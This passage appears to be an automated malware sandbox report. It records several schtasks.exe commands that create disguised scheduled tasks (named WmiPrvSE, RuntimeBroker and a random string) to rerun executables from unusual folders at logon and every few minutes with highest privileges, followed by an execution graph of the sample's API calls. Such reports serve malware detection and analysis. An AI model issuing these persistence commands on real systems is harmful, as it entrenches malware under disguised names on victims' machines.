            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:31
            Start time:19:27:10
            Start date:10/10/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcD" /sc ONLOGON /tr "'C:\Program Files (x86)\windows portable devices\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f
            Imagebase:0x7ff698eb0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:32
            Start time:19:27:10
            Start date:10/10/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows portable devices\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f
            Imagebase:0x7ff698eb0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:33
            Start time:19:27:10
            Start date:10/10/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\Documents\WmiPrvSE.exe'" /f
            Imagebase:0x7ff698eb0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:34
            Start time:19:27:10
            Start date:10/10/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\Default User\Documents\WmiPrvSE.exe'" /rl HIGHEST /f
            Imagebase:0x7ff698eb0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:35
            Start time:19:27:10
            Start date:10/10/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\Documents\WmiPrvSE.exe'" /rl HIGHEST /f
            Imagebase:0x7ff698eb0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:36
            Start time:19:27:10
            Start date:10/10/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Recovery\RuntimeBroker.exe'" /f
            Imagebase:0x7ff698eb0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:37
            Start time:19:27:10
            Start date:10/10/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f
            Imagebase:0x7ff698eb0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:38
            Start time:19:27:11
            Start date:10/10/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f
            Imagebase:0x7ff698eb0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:39
            Start time:19:27:11
            Start date:10/10/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 9 /tr "'C:\Windows\Logs\SettingSync\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /f
            Imagebase:0x7ff698eb0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:40
            Start time:19:27:11
            Start date:10/10/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcD" /sc ONLOGON /tr "'C:\Windows\Logs\SettingSync\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f
            Imagebase:0x7ff698eb0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:41
            Start time:19:27:11
            Start date:10/10/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 13 /tr "'C:\Windows\Logs\SettingSync\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f
            Imagebase:0x7ff698eb0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Reset < >

              Execution Graph

              Execution Coverage:9.9%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:9.3%
              Total number of Nodes:1524
              Total number of Limit Nodes:44
              execution_graph 24951 825780 QueryPerformanceFrequency QueryPerformanceCounter 23067 801385 82 API calls 3 library calls 23262 81d891 19 API calls ___delayLoadHelper2@8 24901 817090 114 API calls 24902 81cc90 70 API calls 24952 81a990 97 API calls 24953 819b90 GdipCloneImage GdipAlloc 24954 829b90 21 API calls 2 library calls 24955 822397 48 API calls 23265 81d997 23266 81d89b 23265->23266 23267 81df59 ___delayLoadHelper2@8 19 API calls 23266->23267 23267->23266 24905 80ea98 FreeLibrary 24906 81a89d 78 API calls 24907 8096a0 79 API calls 24956 82e9a0 51 API calls 24910 81e4a2 38 API calls 2 library calls 24911 8016b0 84 API calls 23290 8290b0 23298 82a56f 23290->23298 23293 8290c4 23295 8290cc 23296 8290d9 23295->23296 23306 8290e0 11 API calls 23295->23306 23307 82a458 23298->23307 23301 82a5ae TlsAlloc 23304 82a59f 23301->23304 23302 81ec4a _ValidateLocalCookies 5 API calls 23303 8290ba 23302->23303 23303->23293 23305 829029 20 API calls 3 library calls 23303->23305 23304->23302 23305->23295 23306->23293 23308 82a484 23307->23308 23309 82a488 23307->23309 23308->23309 23312 82a4a8 23308->23312 23314 82a4f4 23308->23314 23309->23301 23309->23304 23311 82a4b4 GetProcAddress 23313 82a4c4 __crt_fast_encode_pointer 23311->23313 23312->23309 23312->23311 23313->23309 23315 82a515 LoadLibraryExW 23314->23315 23316 82a50a 23314->23316 23317 82a532 GetLastError 23315->23317 23318 82a54a 23315->23318 23316->23308 23317->23318 23319 82a53d LoadLibraryExW 23317->23319 23318->23316 23320 82a561 FreeLibrary 23318->23320 23319->23318 23320->23316 23321 82a3b0 23322 82a3bb 23321->23322 23324 82a3e4 23322->23324 23326 82a3e0 23322->23326 23327 82a6ca 23322->23327 23334 82a410 DeleteCriticalSection 23324->23334 23328 82a458 FindHandler 5 API calls 23327->23328 23329 82a6f1 23328->23329 23330 82a70f InitializeCriticalSectionAndSpinCount 23329->23330 23331 82a6fa 23329->23331 23330->23331 23332 81ec4a _ValidateLocalCookies 5 API calls 23331->23332 23333 82a726 23332->23333 23333->23322 23334->23326 24912 821eb0 6 API calls 4 library calls 24958 8279b7 55 API calls _free 23337 8276bd 23338 8276e8 23337->23338 23339 8276cc 23337->23339 23360 82b290 23338->23360 23339->23338 23340 8276d2 23339->23340 23364 82895a 20 API calls __dosmaperr 23340->23364 23344 8276d7 23365 828839 26 API calls pre_c_initialization 23344->23365 23345 827713 23366 8277e1 38 API calls 23345->23366 23347 8276e1 23349 827730 23367 827956 20 API calls 2 library calls 23349->23367 23351 82773d 23352 827752 23351->23352 23353 827746 23351->23353 23369 8277e1 38 API calls 23352->23369 23368 82895a 20 API calls __dosmaperr 23353->23368 23356 8284de _free 20 API calls 23356->23347 23357 827768 23358 8284de _free 20 API calls 23357->23358 23359 82774b 23357->23359 23358->23359 23359->23356 23361 82b299 23360->23361 23363 8276ef GetModuleFileNameA 23360->23363 23370 82b188 23361->23370 23363->23345 23364->23344 23365->23347 23366->23349 23367->23351 23368->23359 23369->23357 23371 828fa5 FindHandler 38 API calls 23370->23371 23372 82b195 23371->23372 23390 82b2ae 23372->23390 23374 82b19d 23399 82af1b 23374->23399 23377 828518 __vswprintf_c_l 21 API calls 23378 82b1c5 23377->23378 23380 82b1f7 23378->23380 23406 82b350 23378->23406 23382 8284de _free 20 API calls 23380->23382 23384 82b1b4 23382->23384 23383 82b1f2 23416 82895a 20 API calls __dosmaperr 23383->23416 23384->23363 23386 82b23b 23386->23380 23417 82adf1 26 API calls 23386->23417 23387 82b20f 23387->23386 23388 8284de _free 20 API calls 23387->23388 23388->23386 23391 82b2ba CallCatchBlock 23390->23391 23392 828fa5 FindHandler 38 API calls 23391->23392 23393 82b2c4 23392->23393 23397 82b348 CallCatchBlock 23393->23397 23398 8284de _free 20 API calls 23393->23398 23418 828566 38 API calls _abort 23393->23418 23419 82a3f1 EnterCriticalSection 23393->23419 23420 82b33f LeaveCriticalSection _abort 23393->23420 23397->23374 23398->23393 23400 823dd6 __cftof 38 API calls 23399->23400 23401 82af2d 23400->23401 23402 82af4e 23401->23402 23403 82af3c GetOEMCP 23401->23403 23404 82af65 23402->23404 23405 82af53 GetACP 23402->23405 23403->23404 23404->23377 23404->23384 23405->23404 23407 82af1b 40 API calls 23406->23407 23408 82b36f 23407->23408 23411 82b3c0 IsValidCodePage 23408->23411 23413 82b376 23408->23413 23415 82b3e5 ___scrt_get_show_window_mode 23408->23415 23409 81ec4a _ValidateLocalCookies 5 API calls 23410 82b1ea 23409->23410 23410->23383 23410->23387 23412 82b3d2 GetCPInfo 23411->23412 23411->23413 23412->23413 23412->23415 23413->23409 23421 82aff4 GetCPInfo 23415->23421 23416->23380 23417->23380 23419->23393 23420->23393 23427 82b02e 23421->23427 23430 82b0d8 23421->23430 23423 81ec4a _ValidateLocalCookies 5 API calls 23426 82b184 23423->23426 23426->23413 23431 82c099 23427->23431 23429 82a275 __vswprintf_c_l 43 API calls 23429->23430 23430->23423 23432 823dd6 __cftof 38 API calls 23431->23432 23433 82c0b9 MultiByteToWideChar 23432->23433 23435 82c0f7 23433->23435 23442 82c18f 23433->23442 23438 828518 __vswprintf_c_l 21 API calls 23435->23438 23443 82c118 __vsnwprintf_l ___scrt_get_show_window_mode 23435->23443 23436 81ec4a _ValidateLocalCookies 5 API calls 23439 82b08f 23436->23439 23437 82c189 23450 82a2c0 20 API calls _free 23437->23450 23438->23443 23445 82a275 23439->23445 23441 82c15d MultiByteToWideChar 23441->23437 23444 82c179 GetStringTypeW 23441->23444 23442->23436 23443->23437 23443->23441 23444->23437 23446 823dd6 __cftof 38 API calls 23445->23446 23447 82a288 23446->23447 23451 82a058 23447->23451 23450->23442 23453 82a073 __vswprintf_c_l 23451->23453 23452 82a099 MultiByteToWideChar 23454 82a0c3 23452->23454 23455 82a24d 23452->23455 23453->23452 23460 828518 __vswprintf_c_l 21 API calls 23454->23460 23462 82a0e4 __vsnwprintf_l 23454->23462 23456 81ec4a _ValidateLocalCookies 5 API calls 23455->23456 23457 82a260 23456->23457 23457->23429 23458 82a199 23487 82a2c0 20 API calls _free 23458->23487 23459 82a12d MultiByteToWideChar 23459->23458 23461 82a146 23459->23461 23460->23462 23478 82a72c 23461->23478 23462->23458 23462->23459 23466 82a170 23466->23458 23469 82a72c __vswprintf_c_l 11 API calls 23466->23469 23467 82a1a8 23468 828518 __vswprintf_c_l 21 API calls 23467->23468 23472 82a1c9 __vsnwprintf_l 23467->23472 23468->23472 23469->23458 23470 82a23e 23486 82a2c0 20 API calls _free 23470->23486 23472->23470 23473 82a72c __vswprintf_c_l 11 API calls 23472->23473 23474 82a21d 23473->23474 23474->23470 23475 82a22c WideCharToMultiByte 23474->23475 23475->23470 23476 82a26c 23475->23476 23488 82a2c0 20 API calls _free 23476->23488 23479 82a458 FindHandler 5 API calls 23478->23479 23480 82a753 23479->23480 23483 82a75c 23480->23483 23489 82a7b4 10 API calls 3 library calls 23480->23489 23482 82a79c LCMapStringW 23482->23483 23484 81ec4a _ValidateLocalCookies 5 API calls 23483->23484 23485 82a15d 23484->23485 23485->23458 23485->23466 23485->23467 23486->23458 23487->23455 23488->23458 23489->23482 24914 81eac0 27 API calls pre_c_initialization 24961 8197c0 10 API calls 24916 829ec0 21 API calls 24962 82b5c0 GetCommandLineA GetCommandLineW 24917 81a8c2 GetDlgItem EnableWindow ShowWindow SendMessageW 24963 82ebc1 21 API calls __vswprintf_c_l 24918 81acd0 100 API calls 24967 8119d0 26 API calls std::bad_exception::bad_exception 23501 81ead2 23502 81eade CallCatchBlock 23501->23502 23527 81e5c7 23502->23527 23504 81eae5 23506 81eb0e 23504->23506 23607 81ef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 23504->23607 23513 81eb4d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23506->23513 23538 82824d 23506->23538 23510 81eb2d CallCatchBlock 23511 81ebad 23546 81f020 23511->23546 23513->23511 23608 827243 38 API calls 3 library calls 23513->23608 23522 81ebd9 23524 81ebe2 23522->23524 23609 82764a 28 API calls _abort 23522->23609 23610 81e73e 13 API calls 2 library calls 23524->23610 23528 81e5d0 23527->23528 23611 81ed5b IsProcessorFeaturePresent 23528->23611 23530 81e5dc 23612 822016 23530->23612 23532 81e5e1 23537 81e5e5 23532->23537 23621 8280d7 23532->23621 23535 81e5fc 23535->23504 23537->23504 23541 828264 23538->23541 23539 81ec4a _ValidateLocalCookies 5 API calls 23540 81eb27 23539->23540 23540->23510 23542 8281f1 23540->23542 23541->23539 23543 828220 23542->23543 23544 81ec4a _ValidateLocalCookies 5 API calls 23543->23544 23545 828249 23544->23545 23545->23513 23671 81f350 23546->23671 23548 81f033 GetStartupInfoW 23549 81ebb3 23548->23549 23550 82819e 23549->23550 23551 82b290 51 API calls 23550->23551 23553 8281a7 23551->23553 23552 81ebbc 23555 81d5d4 23552->23555 23553->23552 23673 82b59a 38 API calls 23553->23673 23674 8100cf 23555->23674 23559 81d5f3 23723 81a335 23559->23723 23561 81d5fc 23727 8113b3 GetCPInfo 23561->23727 23563 81d606 ___scrt_get_show_window_mode 23564 81d619 GetCommandLineW 23563->23564 23565 81d6a6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23564->23565 23566 81d628 23564->23566 23567 80400a _swprintf 51 API calls 23565->23567 23730 81bc84 23566->23730 23569 81d70d SetEnvironmentVariableW GetModuleHandleW LoadIconW 23567->23569 23741 81aded LoadBitmapW 23569->23741 23572 81d6a0 23735 81d287 23572->23735 23573 81d636 OpenFileMappingW 23576 81d696 CloseHandle 23573->23576 23577 81d64f MapViewOfFile 23573->23577 23576->23565 23579 81d68d UnmapViewOfFile 23577->23579 23581 81d660 __vswprintf_c_l 23577->23581 23579->23576 23583 81d287 2 API calls 23581->23583 23585 81d67c 23583->23585 23585->23579 23586 818835 8 API calls 23587 81d76a DialogBoxParamW 23586->23587 23588 81d7a4 23587->23588 23589 81d7b6 Sleep 23588->23589 23590 81d7bd 23588->23590 23589->23590 23593 81d7cb 23590->23593 23771 81a544 CompareStringW SetCurrentDirectoryW ___scrt_get_show_window_mode 23590->23771 23592 81d7ea DeleteObject 23594 81d806 23592->23594 23595 81d7ff DeleteObject 23592->23595 23593->23592 23596 81d837 23594->23596 23597 81d849 23594->23597 23595->23594 23772 81d2e6 6 API calls 23596->23772 23768 81a39d 23597->23768 23600 81d83d CloseHandle 23600->23597 23601 81d883 23602 82757e GetModuleHandleW 23601->23602 23603 81ebcf 23602->23603 23603->23522 23604 8276a7 23603->23604 23981 827424 23604->23981 23607->23504 23608->23511 23609->23524 23610->23510 23611->23530 23613 82201b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 23612->23613 23625 82310e 23613->23625 23617 822031 23618 82203c 23617->23618 23639 82314a DeleteCriticalSection 23617->23639 23618->23532 23620 822029 23620->23532 23667 82b73a 23621->23667 23624 82203f 8 API calls 3 library calls 23624->23537 23626 823117 23625->23626 23628 823140 23626->23628 23630 822025 23626->23630 23640 823385 23626->23640 23645 82314a DeleteCriticalSection 23628->23645 23630->23620 23631 82215c 23630->23631 23660 82329a 23631->23660 23633 822166 23634 822171 23633->23634 23665 823348 6 API calls try_get_function 23633->23665 23634->23617 23636 82217f 23637 82218c 23636->23637 23666 82218f 6 API calls ___vcrt_FlsFree 23636->23666 23637->23617 23639->23620 23646 823179 23640->23646 23643 8233bc InitializeCriticalSectionAndSpinCount 23644 8233a8 23643->23644 23644->23626 23645->23630 23647 8231ad 23646->23647 23648 8231a9 23646->23648 23647->23643 23647->23644 23648->23647 23652 8231cd 23648->23652 23653 823219 23648->23653 23650 8231d9 GetProcAddress 23651 8231e9 __crt_fast_encode_pointer 23650->23651 23651->23647 23652->23647 23652->23650 23654 823241 LoadLibraryExW 23653->23654 23655 823236 23653->23655 23656 823275 23654->23656 23657 82325d GetLastError 23654->23657 23655->23648 23656->23655 23658 82328c FreeLibrary 23656->23658 23657->23656 23659 823268 LoadLibraryExW 23657->23659 23658->23655 23659->23656 23661 823179 try_get_function 5 API calls 23660->23661 23662 8232b4 23661->23662 23663 8232cc TlsAlloc 23662->23663 23664 8232bd 23662->23664 23664->23633 23665->23636 23666->23634 23668 82b753 23667->23668 23669 81ec4a _ValidateLocalCookies 5 API calls 23668->23669 23670 81e5ee 23669->23670 23670->23535 23670->23624 23672 81f367 23671->23672 23672->23548 23672->23672 23673->23553 23675 81e360 23674->23675 23676 8100d9 GetModuleHandleW 23675->23676 23677 8100f0 GetProcAddress 23676->23677 23678 810154 23676->23678 23680 810121 GetProcAddress 23677->23680 23681 810109 23677->23681 23679 810484 GetModuleFileNameW 23678->23679 23782 8270dd 42 API calls __vsnwprintf_l 23678->23782 23693 8104a3 23679->23693 23680->23678 23683 810133 23680->23683 23681->23680 23683->23678 23684 8103be 23684->23679 23685 8103c9 GetModuleFileNameW CreateFileW 23684->23685 23686 810478 CloseHandle 23685->23686 23687 8103fc SetFilePointer 23685->23687 23686->23679 23687->23686 23688 81040c ReadFile 23687->23688 23688->23686 23691 81042b 23688->23691 23691->23686 23694 810085 2 API calls 23691->23694 23692 8104d2 CompareStringW 23692->23693 23693->23692 23695 810508 GetFileAttributesW 23693->23695 23696 810520 23693->23696 23773 80acf5 23693->23773 23776 810085 23693->23776 23694->23691 23695->23693 23695->23696 23697 81052a 23696->23697 23699 810560 23696->23699 23700 810542 GetFileAttributesW 23697->23700 23702 81055a 23697->23702 23698 81066f 23722 819da4 GetCurrentDirectoryW 23698->23722 23699->23698 23701 80acf5 GetVersionExW 23699->23701 23700->23697 23700->23702 23703 81057a 23701->23703 23702->23699 23704 810581 23703->23704 23705 8105e7 23703->23705 23707 810085 2 API calls 23704->23707 23706 80400a _swprintf 51 API calls 23705->23706 23708 81060f AllocConsole 23706->23708 23709 81058b 23707->23709 23710 810667 ExitProcess 23708->23710 23711 81061c GetCurrentProcessId AttachConsole 23708->23711 23712 810085 2 API calls 23709->23712 23786 8235b3 23711->23786 23714 810595 23712->23714 23783 80ddd1 23714->23783 23715 81063d GetStdHandle WriteConsoleW Sleep FreeConsole 23715->23710 23718 80400a _swprintf 51 API calls 23719 8105c3 23718->23719 23720 80ddd1 53 API calls 23719->23720 23721 8105d2 23720->23721 23721->23710 23722->23559 23724 810085 2 API calls 23723->23724 23725 81a349 OleInitialize 23724->23725 23726 81a36c GdiplusStartup SHGetMalloc 23725->23726 23726->23561 23728 8113d7 IsDBCSLeadByte 23727->23728 23728->23728 23729 8113ef 23728->23729 23729->23563 23734 81bc8e 23730->23734 23731 81bda4 23731->23572 23731->23573 23732 81179d CharUpperW 23732->23734 23734->23731 23734->23732 23811 80ecad 80 API calls ___scrt_get_show_window_mode 23734->23811 23736 81e360 23735->23736 23737 81d294 SetEnvironmentVariableW 23736->23737 23739 81d2b7 23737->23739 23738 81d2df 23738->23565 23739->23738 23740 81d2d3 SetEnvironmentVariableW 23739->23740 23740->23738 23742 81ae15 23741->23742 23743 81ae0e 23741->23743 23745 81ae1b GetObjectW 23742->23745 23746 81ae2a 23742->23746 23817 819e1c FindResourceW 23743->23817 23745->23746 23812 819d1a 23746->23812 23749 81ae80 23760 80d31c 23749->23760 23750 81ae5c 23833 819d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23750->23833 23751 819e1c 13 API calls 23753 81ae4d 23751->23753 23753->23750 23756 81ae53 DeleteObject 23753->23756 23754 81ae64 23834 819d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23754->23834 23756->23750 23757 81ae6d 23835 819f5d 8 API calls ___scrt_get_show_window_mode 23757->23835 23759 81ae74 DeleteObject 23759->23749 23846 80d341 23760->23846 23762 80d328 23886 80da4e GetModuleHandleW FindResourceW 23762->23886 23765 818835 23972 81e24a 23765->23972 23769 81a3cc GdiplusShutdown CoUninitialize 23768->23769 23769->23601 23771->23593 23772->23600 23774 80ad09 GetVersionExW 23773->23774 23775 80ad45 23773->23775 23774->23775 23775->23693 23777 81e360 23776->23777 23778 810092 GetSystemDirectoryW 23777->23778 23779 8100c8 23778->23779 23780 8100aa 23778->23780 23779->23693 23781 8100bb LoadLibraryW 23780->23781 23781->23779 23782->23684 23788 80ddff 23783->23788 23787 8235bb 23786->23787 23787->23715 23787->23787 23794 80d28a 23788->23794 23791 80de22 LoadStringW 23792 80ddfc 23791->23792 23793 80de39 LoadStringW 23791->23793 23792->23718 23793->23792 23799 80d1c3 23794->23799 23796 80d2a7 23797 80d2bc 23796->23797 23807 80d2c8 26 API calls 23796->23807 23797->23791 23797->23792 23800 80d1de 23799->23800 23806 80d1d7 _strncpy 23799->23806 23803 80d202 23800->23803 23808 811596 WideCharToMultiByte 23800->23808 23802 80d233 23810 8258d9 26 API calls 3 library calls 23802->23810 23803->23802 23809 80dd6b 50 API calls __vsnprintf 23803->23809 23806->23796 23807->23797 23808->23803 23809->23802 23810->23806 23811->23734 23836 819d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23812->23836 23814 819d21 23815 819d2d 23814->23815 23837 819d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23814->23837 23815->23749 23815->23750 23815->23751 23818 819e70 23817->23818 23819 819e3e SizeofResource 23817->23819 23818->23742 23819->23818 23820 819e52 LoadResource 23819->23820 23820->23818 23821 819e63 LockResource 23820->23821 23821->23818 23822 819e77 GlobalAlloc 23821->23822 23822->23818 23823 819e92 GlobalLock 23822->23823 23824 819f21 GlobalFree 23823->23824 23825 819ea1 __vswprintf_c_l 23823->23825 23824->23818 23826 819ea9 CreateStreamOnHGlobal 23825->23826 23827 819ec1 23826->23827 23828 819f1a GlobalUnlock 23826->23828 23838 819d7b GdipAlloc 23827->23838 23828->23824 23831 819f05 23831->23828 23832 819eef GdipCreateHBITMAPFromBitmap 23832->23831 23833->23754 23834->23757 23835->23759 23836->23814 23837->23815 23839 819d8d 23838->23839 23840 819d9a 23838->23840 23842 819b0f 23839->23842 23840->23828 23840->23831 23840->23832 23843 819b30 GdipCreateBitmapFromStreamICM 23842->23843 23844 819b37 GdipCreateBitmapFromStream 23842->23844 23845 819b3c 23843->23845 23844->23845 23845->23840 23847 80d34b _wcschr __EH_prolog 23846->23847 23848 80d37a GetModuleFileNameW 23847->23848 23849 80d3ab 23847->23849 23850 80d394 23848->23850 23888 8099b0 23849->23888 23850->23849 23853 80d407 23899 825a90 26 API calls 3 library calls 23853->23899 23855 813781 76 API calls 23857 80d3db 23855->23857 23857->23853 23857->23855 23870 80d627 23857->23870 23858 80d41a 23900 825a90 26 API calls 3 library calls 23858->23900 23860 80d563 23860->23870 23925 809d30 77 API calls 23860->23925 23864 80d57d ___std_exception_copy 23865 809bf0 80 API calls 23864->23865 23864->23870 23868 80d5a6 ___std_exception_copy 23865->23868 23867 80d42c 23867->23860 23867->23870 23901 809e40 23867->23901 23916 809bf0 23867->23916 23924 809d30 77 API calls 23867->23924 23868->23870 23883 80d5b2 ___std_exception_copy 23868->23883 23926 81137a MultiByteToWideChar 23868->23926 23909 809653 23870->23909 23871 80d72b 23927 80ce72 76 API calls 23871->23927 23873 80da0a 23932 80ce72 76 API calls 23873->23932 23875 80d9fa 23875->23762 23876 80d771 23928 825a90 26 API calls 3 library calls 23876->23928 23878 80d742 23878->23876 23881 813781 76 API calls 23878->23881 23879 80d78b 23929 825a90 26 API calls 3 library calls 23879->23929 23881->23878 23882 811596 WideCharToMultiByte 23882->23883 23883->23870 23883->23871 23883->23873 23883->23875 23883->23882 23930 80dd6b 50 API calls __vsnprintf 23883->23930 23931 8258d9 26 API calls 3 library calls 23883->23931 23887 80d32f 23886->23887 23887->23765 23889 8099ba 23888->23889 23890 809a39 CreateFileW 23889->23890 23891 809a59 GetLastError 23890->23891 23892 809aaa 23890->23892 23893 80b66c 2 API calls 23891->23893 23894 809ae1 23892->23894 23896 809ac7 SetFileTime 23892->23896 23895 809a79 23893->23895 23894->23857 23895->23892 23897 809a7d CreateFileW GetLastError 23895->23897 23896->23894 23898 809aa1 23897->23898 23898->23892 23899->23858 23900->23867 23902 809e53 23901->23902 23903 809e64 SetFilePointer 23901->23903 23905 809e9d 23902->23905 23933 806fa5 75 API calls 23902->23933 23904 809e82 GetLastError 23903->23904 23903->23905 23904->23905 23907 809e8c 23904->23907 23905->23867 23907->23905 23934 806fa5 75 API calls 23907->23934 23910 809677 23909->23910 23915 809688 23909->23915 23911 809683 23910->23911 23912 80968a 23910->23912 23910->23915 23935 809817 23911->23935 23940 8096d0 23912->23940 23915->23762 23918 809bfc 23916->23918 23920 809c03 23916->23920 23918->23867 23919 809c9e 23919->23918 23967 806f6b 75 API calls 23919->23967 23920->23918 23920->23919 23922 809cc0 23920->23922 23955 80984e 23920->23955 23922->23918 23923 80984e 5 API calls 23922->23923 23923->23922 23924->23867 23925->23864 23926->23883 23927->23878 23928->23879 23929->23870 23930->23883 23931->23883 23932->23875 23933->23903 23934->23905 23936 809820 23935->23936 23937 809824 23935->23937 23936->23915 23937->23936 23946 80a12d 23937->23946 23941 8096dc 23940->23941 23942 8096fa 23940->23942 23941->23942 23944 8096e8 CloseHandle 23941->23944 23943 809719 23942->23943 23954 806e3e 74 API calls 23942->23954 23943->23915 23944->23942 23947 81e360 23946->23947 23948 80a13a DeleteFileW 23947->23948 23949 80984c 23948->23949 23950 80a14d 23948->23950 23949->23915 23951 80b66c 2 API calls 23950->23951 23952 80a161 23951->23952 23952->23949 23953 80a165 DeleteFileW 23952->23953 23953->23949 23954->23943 23956 809867 ReadFile 23955->23956 23957 80985c GetStdHandle 23955->23957 23958 809880 23956->23958 23959 8098a0 23956->23959 23957->23956 23968 809989 23958->23968 23959->23920 23961 809887 23962 809895 23961->23962 23963 8098b7 23961->23963 23964 8098a8 GetLastError 23961->23964 23966 80984e GetFileType 23962->23966 23963->23959 23965 8098c7 GetLastError 23963->23965 23964->23959 23964->23963 23965->23959 23965->23962 23966->23959 23967->23918 23969 809992 GetFileType 23968->23969 23970 80998f 23968->23970 23971 8099a0 23969->23971 23970->23961 23971->23961 23974 81e24f ___std_exception_copy 23972->23974 23973 818854 23973->23586 23974->23973 23978 8271ad 7 API calls 2 library calls 23974->23978 23979 81ecce RaiseException FindHandler new 23974->23979 23980 81ecb1 RaiseException Concurrency::cancel_current_task FindHandler 23974->23980 23978->23974 23982 827430 FindHandler 23981->23982 23983 82757e _abort GetModuleHandleW 23982->23983 23990 827448 23982->23990 23985 82743c 23983->23985 23985->23990 24015 8275c2 GetModuleHandleExW 23985->24015 23986 8274ee 24004 82752e 23986->24004 23989 8274c5 23994 8274dd 23989->23994 23998 8281f1 _abort 5 API calls 23989->23998 24003 82a3f1 EnterCriticalSection 23990->24003 23992 827537 24024 831a19 5 API calls _ValidateLocalCookies 23992->24024 23993 82750b 24007 82753d 23993->24007 23999 8281f1 _abort 5 API calls 23994->23999 23998->23994 23999->23986 24000 827450 24000->23986 24000->23989 24023 827f30 20 API calls _abort 24000->24023 24003->24000 24025 82a441 LeaveCriticalSection 24004->24025 24006 827507 24006->23992 24006->23993 24026 82a836 24007->24026 24010 82756b 24013 8275c2 _abort 8 API calls 24010->24013 24011 82754b GetPEB 24011->24010 24012 82755b GetCurrentProcess TerminateProcess 24011->24012 24012->24010 24014 827573 ExitProcess 24013->24014 24016 82760f 24015->24016 24017 8275ec GetProcAddress 24015->24017 